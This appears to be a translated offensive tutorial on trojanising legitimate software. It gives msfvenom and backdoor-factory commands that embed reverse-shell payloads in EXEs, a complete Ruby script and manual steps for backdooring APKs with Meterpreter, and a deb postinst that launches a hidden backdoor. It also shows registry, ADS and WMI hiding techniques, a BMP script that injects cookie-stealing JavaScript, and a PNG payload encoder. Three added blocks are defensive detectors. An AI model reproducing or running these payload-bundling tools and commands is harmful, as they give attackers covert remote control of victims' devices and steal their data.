Payload Inject And Fake

Common payload bundling and injection techniques

Bundling a payload with msfvenom

Inject into an exe template, with encoding:
msfvenom -a <arch> --platform <platform> -p <payload> <payload options> -e <encoder> -i <encoder iterations> -x <template exe> -k -f <format> -o <path>

Concatenate with existing shellcode:
msfvenom -a <arch> --platform <platform> -p <payload> -c <shellcode file> <payload options> -e <encoder> -i <encoder iterations> -f <format> -o <path>

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_nai -f exe > testtmp.exe

-p also accepts a custom payload from stdin (-p -):
cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw


backdoor-factory

Inject a payload into a chosen program:
backdoor-factory -f Test.exe -S                   # check whether the file supports injection
backdoor-factory -f Test.exe -s show              # list the parameters the injection payloads need
backdoor-factory -f Test.exe -s .... -H <host> -P <port> -a
backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D   # search for applications automatically (-i), inject the reverse payload (-a) and delete the original file (-D)
-u .moocowwow   # -u renames the original file to the given extension

User-supplied shellcode

msfvenom -p windows/exec CMD='calc.exe' R > calc.bin
backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin

veil-evasion

>native/backdoor_factory
>set LHOST .....
>set LPORT
>set orig_exe /path/to/program-to-backdoor
>info        show the current settings
>generate    generate the payload
Do not include an extension when choosing the output name

shellter

Basic usage is not covered here; this is about loading a custom payload.

First generate the payload with msf:

msf > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > show options
msf payload(reverse_http) > set lhost xxx
msf payload(reverse_http) > set exitfunc thread
msf payload(reverse_http) > generate -E -e x86/shikata_ga_nai -t raw -f shellcode.raw

or

msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 8 -b '\x00' LHOST=xxx LPORT=xx -f raw -o shellcode.raw

Then, in shellter, pick the freshly generated shellcode.raw at the "Select Payload" step.

Bundling a payload into an APK

(1) ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk
(2) d2j-apk-sign <file>     // re-sign the generated APK (d2j-apk-sign ships with Kali)

Other scripts
apk_binder_script.py, apk-embed-payload.rb, spade, backdoor-apk, etc.

Manually bundling an APK by reversing it

(1) msfvenom -p ..... payload.apk
(2) apktool d /path/payload.apk
    apktool d /path/Normal_File.apk
    Copy the folder under smali/com of the decoded payload into smali/com of the decoded normal app
(3) In the decoded normal app's AndroidManifest.xml, search for 'LAUNCHER',
    e.g. android:targetActivity="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">
    targetActivity is where the program starts; follow that path to NodexSplashActivity.smali
(4) In that file search for 'onCreate':
    invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;->onCreate(Landroid/os/Bundle;)V
    Below that statement add one that launches the payload:
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
(5) Copy the <uses-permission android:name="...."> entries from the payload's AndroidManifest.xml into the corresponding place in the normal APK's manifest
(6) Rebuild the APK: apktool b /Normal/
(7) d2j-apk-sign <file>   # re-sign
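The two modifications the steps above (and the fix_manifest routine of the apk-embed-payload.rb script reproduced further down) make to an app are exactly what a reviewer of a re-signed APK should look for: extra <uses-permission> entries in AndroidManifest.xml, and an invoke-static call inside onCreate() into a class that belongs neither to the app's own package nor to the framework. The following is an added example, not code from the original post or from the script's authors; the two manifests and the smali snippet are constructed samples, and the list of framework prefixes is an assumption to be tuned per app.

```python
# Added example: defender-side check of a decoded (apktool d) APK for the
# changes the manual bundling steps make. Samples below are constructed.
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Matches "invoke-static {...}, Lpkg/Class;->method(" and captures class and method.
INVOKE_RE = re.compile(r"invoke-static\s*\{[^}]*\},\s*L([\w/$]+);->(\w+)\(")

# Framework packages any app legitimately calls into (assumption; extend as needed).
FRAMEWORK_PREFIXES = ("android/", "androidx/", "java/", "javax/", "kotlin/")


def package_name(manifest_xml):
    """Return the package attribute of the <manifest> root element."""
    return ET.fromstring(manifest_xml).get("package")


def declared_permissions(manifest_xml):
    """Set of android:name values of all top-level <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {p.get(ANDROID_NS + "name") for p in root.findall("uses-permission")}


def added_permissions(known_good_xml, suspect_xml):
    """Permissions the suspect manifest declares that the known-good one does not."""
    return sorted(declared_permissions(suspect_xml) - declared_permissions(known_good_xml))


def foreign_invokes(smali_text, package):
    """(class, method) pairs invoked statically on classes outside the app and the framework."""
    own_prefix = package.replace(".", "/") + "/"
    hits = []
    for cls, method in INVOKE_RE.findall(smali_text):
        if cls.startswith(own_prefix) or cls.startswith(FRAMEWORK_PREFIXES):
            continue
        hits.append((cls.replace("/", "."), method))
    return hits


# Constructed sample: the manifest of a known-good build of the app.
KNOWN_GOOD = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application/>
</manifest>"""

# Constructed sample: the same app after someone merged extra permissions in.
SUSPECT = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application/>
</manifest>"""

# Constructed sample: launcher activity smali with one hook into a foreign class.
SUSPECT_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Lcom/example/notes/BaseActivity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    invoke-static {p0}, Lcom/example/notes/Tracker;->init(Landroid/content/Context;)V
    return-void
.end method
"""

if __name__ == "__main__":
    print("added permissions:", added_permissions(KNOWN_GOOD, SUSPECT))
    print("foreign hooks:", foreign_invokes(SUSPECT_SMALI, package_name(SUSPECT)))
```

On a real decoded APK, feed the two AndroidManifest.xml files to added_permissions and run foreign_invokes over every .smali file under smali*/ (the same glob the script uses); a hit into a package that is not a dependency the app declares deserves a closer look.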

Adding a backdoor to a deb package

(1) dpkg -x xx.deb xxx            # unpack xx.deb into the folder xxx
(2) Create a DEBIAN folder (must be upper case) inside xxx
(3) touch control postinst        # create the control and postinst files inside DEBIAN
(4) nano control                  # package metadata; this matters, since a mistake can make the package uninstallable, so copying the whole control file from the original package is advisable
(5) Copy the backdoor program into /usr/bin under the unpacked folder
(6) vi postinst                   # the script run during installation, and what actually starts the backdoor; for example:

#!/bin/sh
sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor &   # run the backdoor program, here called backdoor
sudo /usr/bin/xxx -V   # show the software's version after install; the flag may differ, and the command run here is up to you

(7) chmod 555 postinst   # postinst's permissions must be >= 555 and <= 775
(8) dpkg-deb --build xxx/ xxx.deb   # double-check everything, then build

Start the listener locally and deliver the package to the target to be run...
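Because the postinst script is what runs the planted binary, the defensive counterpart of this procedure is to read a package's maintainer scripts before dpkg does. The following is an added example, not part of the original post: it parses the .deb container (a plain ar archive holding debian-binary, control.tar.* and data.tar.*, which is the standard Debian layout), lists the maintainer scripts found in control.tar.*, and flags lines that background a process or change file modes, as the postinst above does. The sample package is built in memory by build_sample_deb() and is constructed for this example.

```python
# Added example: list and review the maintainer scripts inside a .deb without
# installing it. The sample package is constructed; nothing touches the system.
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def ar_members(blob):
    """Parse a plain 'ar' archive (the outer container of a .deb) into {name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]            # fixed 60-byte member header
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = header[0:16].decode("ascii").rstrip(" /")
        size = int(header[48:58].decode("ascii").strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)            # members start on even offsets
    return members


def maintainer_scripts(deb_blob):
    """Return {script_name: script_text} for every maintainer script in control.tar.*."""
    members = ar_members(deb_blob)
    control_name = next((n for n in members if n.startswith("control.tar")), None)
    if control_name is None:
        raise ValueError("no control.tar member")
    found = {}
    with tarfile.open(fileobj=io.BytesIO(members[control_name]), mode="r:*") as tar:
        for member in tar.getmembers():
            base = member.name.lstrip("./")
            if base in MAINTAINER_SCRIPTS and member.isfile():
                found[base] = tar.extractfile(member).read().decode("utf-8", "replace")
    return found


def review(deb_blob):
    """Flag script lines that background a process ('&') or change file modes (chmod)."""
    findings = []
    for name, text in maintainer_scripts(deb_blob).items():
        for line in text.splitlines():
            stripped = line.strip()
            if stripped.endswith("&") or "chmod" in stripped:
                findings.append((name, stripped))
    return findings


# --- constructed sample package ------------------------------------------------
def _ar_member(name, data):
    header = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
              + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n").encode("ascii")
    return header + data + (b"\n" if len(data) % 2 else b"")


def _tar_bytes(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb():
    """Constructed .deb whose postinst starts a binary in the background (the pattern above)."""
    control = _tar_bytes({
        "./control": b"Package: sample\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: sample\n",
        "./postinst": b"#!/bin/sh\n/usr/bin/helper -V\n/usr/bin/helper --daemon &\n",
    })
    data = _tar_bytes({"./usr/bin/helper": b"#!/bin/sh\necho helper\n"})
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control) + _ar_member("data.tar.gz", data))


if __name__ == "__main__":
    deb = build_sample_deb()
    for script, text in maintainer_scripts(deb).items():
        print("==", script, "==\n" + text)
    print("findings:", review(deb))
```

To run it against a real file, read the .deb into bytes and pass it to review(); dpkg-deb --info and dpkg-deb --ctrl-tarfile give the same view from the command line.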

Windows also has many small tools for this

e.g. the "Evil Backdoor Adder" (邪恶后门添加工具)

Copy xiya.dll from the tool's folder into the folder of the legitimate program, then enter the URL of the previously uploaded trojan into the "backdoor address" field.

Finally click the "add backdoor" button and the trojan's URL is embedded into the legitimate software.

When the "backdoored" software is run, it downloads and runs the configured trojan in the background.

Techniques for hiding a payload

0x00 Goal: keep control of the target host
0x01 Requirement: leave as few files as possible on the target Windows host, lowering the chance of discovery and of a sample being captured
0x02 Methods:

1. Fake the file extension: use an uncommon extension and tuck the file away in some corner of the system
Analysis: the simplest and most direct method, but also the most likely to be found

2. Insert into a legitimate file
Store the payload in the middle or at the end of a legitimate system file
Analysis: a step up from method 1; complexity +1, no separate file is created, stealth +2

3. Hide in the registry
Store the payload encrypted in the registry
Analysis: easily monitored, stealth -1, but Poweliks' use of it earns the technique innovation +2
About Poweliks: appeared around August 2014; the XCon2015 talk "Application-layer persistence attack techniques" also covered it
Characteristic: the payload is stored as non-ASCII characters that the registry editor cannot display normally
Ways the code runs:
(1) Execute JScript directly: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
(2) Read the payload from the registry and execute it: HKCU\software\microsoft\windows\currentversion\run\
Read and execute: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\software\microsoft\windows\currentversion\run\")+"\74/script>")
Note: a JScript encoding site: http://tool.lu/js/

4. ADS (alternate data streams)
Store the payload in an ADS of a legitimate file
Analysis: suits small payloads, commonly used to run VBS or PowerShell scripts; efficiency +1, difficulty -1
Common commands:
List a file's ADS: dir /r test.txt
Write into an ADS: type nc.exe > test.txt:nc.exe
Trigger: a VB script that opens a cmd and runs the script held in test.txt:1
echo Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):command = "cmd /C for /f ""delims=,"" %i in (C:\test\test.txt:1) do %i":objShell.Run command, 0:Set objShell = Nothing > test.txt:run.vbs

5. WMI backdoor
Store the payload in a WMI class; details at the drops link: http://drops.wooyun.org/tips/8260
Analysis: not yet widespread, and detection methods are limited, so stealth +3

6. Steganography
Store the payload inside an image; even Windows' default pictures can be faked
Analysis: steganography is old, but the bar is high, complexity +1, so detection is costly too; stealth +3


Extension disguise:

Some easily overlooked executable extensions:

.scr: screen-saver files.

.pif: "Shortcut to MS-DOS Program" files. The .pif suffix is hidden by default, and stays hidden even when the user turns off hiding of known extensions.

Related articles

http://www.tuicool.com/articles/qINzyum  LSB steganography in PNG files

https://zhuanlan.zhihu.com/p/24054040  Hiding a payload in the JPEG file format

https://zhuanlan.zhihu.com/p/23890809  Hiding a payload in the PNG file format

BMP-JS-inject

#!/usr/bin/env python2.7
#coding:utf-8
"""
e.g.: python BMPinjector.py -i 1.bmp "alert(document.cookie);"
Reference: http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html

JS obfuscation can also be used to get past checks, with the same effect as above:
python BMPinjector.py [-i] 1.bmp "var _0x9c4c="\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"
Note: \x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65 is document.cookie

Demo page run.html
<html>
<head><title>Opening an image</title></head>
<body>
<img src="1.bmp">
<script src="1.bmp"></script>
</body>
</html>
"""
import argparse


def injectFile(payload, fname):
    # read the original image
    with open(fname, "rb") as f:
        b = f.read()

    # overwrite bytes 2-3 (the low bytes of the BMP file-size field) with "/*"
    # so that a JavaScript engine treats everything after "BM" as a comment
    with open(fname, "wb") as f:
        f.write(b)
        f.seek(2, 0)
        f.write(b'\x2F\x2A')

    # close the comment at the end of the file ("\xFF*/=1;") and append the payload
    with open(fname, "ab") as f:
        f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
        f.write(payload)
    return True


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # -i is accepted only so the usage lines above work; it has no effect
    parser.add_argument("-i", action="store_true", help="inject (no-op flag kept for the documented usage)")
    parser.add_argument("filename", help="the bmp file to infect")
    parser.add_argument("js_payload", help='the payload to be injected, for example: "alert(1);"')
    args = parser.parse_args()
    injectFile(args.js_payload, args.filename)


ruby apk-embed-payload.rb

#!/usr/bin/env ruby
# apk_backdoor.rb (also distributed as apk-embed-payload.rb, http://vinayakwadhwa.in/apk-embed-payload.rb)
# This script is a POC for injecting metasploit payloads on
# arbitrary APKs.
# Authored by timwr, Jack64
# Redistributed by PFSFX


require 'nokogiri'
require 'fileutils'
require 'optparse'

# Find the activity that is opened when you click the app icon
def findlauncheractivity(amanifest)
    package = amanifest.xpath("//manifest").first['package']
    activities = amanifest.xpath("//activity|//activity-alias")
    for activity in activities
        activityname = activity.attribute("name")
        category = activity.search('category')
        unless category
            next
        end
        for cat in category
            categoryname = cat.attribute('name')
            if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
                activityname = activityname.to_s
                unless activityname.start_with?(package)
                    activityname = package + activityname
                end
                return activityname
            end
        end
    end
end

# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
def scrapeFilesForLauncherActivity()
    smali_files||=[]
    Dir.glob('original/smali*/**/*.smali') do |file|
      checkFile=File.read(file)
      if (checkFile.include? ";->onCreate(Landroid/os/Bundle;)V")
        smali_files << file
        smalifile = file
        activitysmali = checkFile
      end
    end
    i=0
    print "[*] Please choose from one of the following:\n"
    smali_files.each{|s_file|
        print "[+] Hook point ",i,": ",s_file,"\n"
        i+=1
    }
    hook=-1
    while (hook < 0 || hook>i)
        print "\nHook: "
        hook = STDIN.gets.chomp.to_i
    end
    i=0
    smalifile=""
    activitysmali=""
    smali_files.each{|s_file|
        if (i==hook)
            checkFile=File.read(s_file)
            smalifile=s_file
            activitysmali = checkFile
            break
        end
        i+=1
    }
    return [smalifile,activitysmali]
end

def fix_manifest()
    payload_permissions=[]

    #Load payload's permissions
    File.open("payload/AndroidManifest.xml","r"){|file|
        k=File.read(file)
        payload_manifest=Nokogiri::XML(k)
        permissions = payload_manifest.xpath("//manifest/uses-permission")
        for permission in permissions
            name=permission.attribute("name")
            payload_permissions << name.to_s
        end
    }
    original_permissions=[]
    apk_mani=''

    #Load original apk's permissions
    File.open("original/AndroidManifest.xml","r"){|file2|
        k=File.read(file2)
        apk_mani=k
        original_manifest=Nokogiri::XML(k)
        permissions = original_manifest.xpath("//manifest/uses-permission")
        for permission in permissions
            name=permission.attribute("name")
            original_permissions << name.to_s
        end
    }
    #Get permissions that are not in original APK
    add_permissions=[]
    for permission in payload_permissions
        if !(original_permissions.include? permission)
            print "[*] Adding #{permission}\n"
            add_permissions << permission
        end
    end
    inject=0
    new_mani=""
    #Inject permissions in original APK's manifest
    for line in apk_mani.split("\n")
        if (line.include? "uses-permission" and inject==0)
            for permission in add_permissions
                new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
            end
            new_mani << line+"\n"
            inject=1
        else
            new_mani << line+"\n"
        end
    end
    File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
end

apkfile = ARGV[0]
unless(apkfile && File.readable?(apkfile))
    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
    exit(1)
end

jarsigner = `which jarsigner`
unless(jarsigner && jarsigner.length > 0)
    puts "No jarsigner"
    exit(1)
end

apktool = `which apktool`
unless(apktool && apktool.length > 0)
    puts "No apktool"
    exit(1)
end

apk_v=`apktool`
unless(apk_v.split()[1].include?("v2."))
    puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
    exit(1)
end

begin
    msfvenom_opts = ARGV[1,ARGV.length]
    opts=""
    msfvenom_opts.each{|x|
    opts+=x
    opts+=" "
    }
rescue
    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
    puts "[-] Error parsing msfvenom options. Exiting.\n"
    exit(1)
end



print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
# check both words; "invalid" || "error" only ever tested for "invalid"
if res.downcase.include?("invalid") || res.downcase.include?("error")
    puts res
    exit(1)
end

print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`

`rm -rf original`
`rm -rf payload`

`cp #{apkfile} original.apk`

print "[*] Decompiling original APK..\n"
`apktool d $(pwd)/original.apk -o $(pwd)/original`
print "[*] Decompiling payload APK..\n"
`apktool d $(pwd)/payload.apk -o $(pwd)/payload`

f = File.open("original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.close

print "[*] Locating onCreate() hook..\n"


launcheractivity = findlauncheractivity(amanifest)
# turn the dotted class name into a smali path (the dot must be escaped in the regexp)
smalifile = 'original/smali/' + launcheractivity.gsub(/\./, "/") + '.smali'
begin
    activitysmali = File.read(smalifile)
rescue Errno::ENOENT
    print "[!] Unable to find correct hook automatically\n"
    begin
        results=scrapeFilesForLauncherActivity()
        smalifile=results[0]
        activitysmali=results[1]
    rescue
        puts "[-] Error finding launcher activity. Exiting"
        exit(1)
    end
end

print "[*] Copying payload files..\n"
FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "w") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0]
injected_apk+="_backdoored.apk"

print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()

print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`

puts "[+] Infected file #{injected_apk} ready.\n"
    

Embedding a payload in a PNG image (alpha channel)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# http://bobao.360.cn/learning/detail/3274.html
# python encode.py image.png image_out.png payload.dat
# Python 2 script (b64encode returns str, xrange). The input image must be RGBA,
# since getpixel is unpacked into four values. The payload is base64-encoded and
# written one character per pixel into the alpha channel, column by column,
# with 0x00 padding for the remaining pixels.

from PIL import Image
from sys import argv
from base64 import b64encode

i = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:
    text = f.read()

img_in = Image.open(i)
img_pad = img_in.size[0] * img_in.size[1]   # one payload byte per pixel
text = b64encode(text)
if len(text) < img_pad:
    text = text + '\x00' * (img_pad - len(text))   # pad so every pixel gets a value
else:
    print('File is too large to embed into the image.')
    quit()
# split into one chunk per image column (chunk length = image height)
text = [text[k:k + img_in.size[1]] for k in range(0, len(text), img_in.size[1])]

img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)

for ih, tblock in zip(xrange(img_in.size[0]), text):
    for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]):
        x, y, z, a = img_in.getpixel((ih, iv))   # keep RGB, replace the alpha value
        pixels = (x, y, z, an)
        img_o.putpixel((ih, iv), pixels)

img_o.save(o)
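The encoder above gives the image an alpha channel that a real photo never has: every value is either 0x00 padding or a byte from the base64 alphabet, and the fully opaque value 255 never appears. That makes the carrier easy to recognise without any reference image. The following is an added example, not part of the original post or of the linked article: a check over an RGBA pixel sequence, plus a helper that pulls the non-zero alpha bytes back out for inspection. The pixel arrays are constructed; the PIL loader is the only piece that needs the library and is not exercised here.

```python
# Added example: recognise an alpha channel that carries base64 text the way the
# encoder above writes it. OPAQUE and CARRIER are constructed pixel sequences.
import base64
import string

BASE64_BYTES = set((string.ascii_letters + string.digits + "+/=").encode("ascii"))


def alpha_values(pixels):
    """Alpha components of an RGBA pixel sequence (pixels without alpha are ignored)."""
    return [p[3] for p in pixels if len(p) == 4]


def alpha_is_base64_like(pixels, min_pixels=64):
    """True when every non-zero alpha is a base64 character and no pixel is fully opaque."""
    alphas = alpha_values(pixels)
    if len(alphas) < min_pixels:
        return False                       # too little data to judge
    payload = [a for a in alphas if a != 0]
    if not payload:
        return False                       # all-transparent image, not a carrier
    return 255 not in alphas and all(a in BASE64_BYTES for a in payload)


def recover_alpha_text(pixels):
    """Non-zero alpha bytes in the order supplied. The encoder writes column by
    column, so pass pixels in that order (not PIL's row-major getdata order)
    to get the original base64 string back."""
    return bytes(a for a in alpha_values(pixels) if a != 0)


def load_pixels(path):
    """Read a real file with PIL (only needed outside the constructed samples)."""
    from PIL import Image
    return list(Image.open(path).convert("RGBA").getdata())


# Constructed: an ordinary opaque image and a carrier holding base64("hello world").
OPAQUE = [(10, 20, 30, 255)] * 100
CARRIER = [(10, 20, 30, c) for c in b"aGVsbG8gd29ybGQ="] + [(10, 20, 30, 0)] * 84

if __name__ == "__main__":
    print("opaque looks like a carrier:", alpha_is_base64_like(OPAQUE))
    print("carrier looks like a carrier:", alpha_is_base64_like(CARRIER))
    print("recovered:", base64.b64decode(recover_alpha_text(CARRIER)))
```

A partially transparent image with genuine alpha values (say 128 and 255) fails the test on both counts, which keeps the check specific to this encoder's output rather than to any image with an alpha channel.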
    


Related links

http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

http://xiao106347.blog.163.com/blog/static/215992078201401223746744/

Original: https://www.cnblogs.com/ssooking/p/5932136.html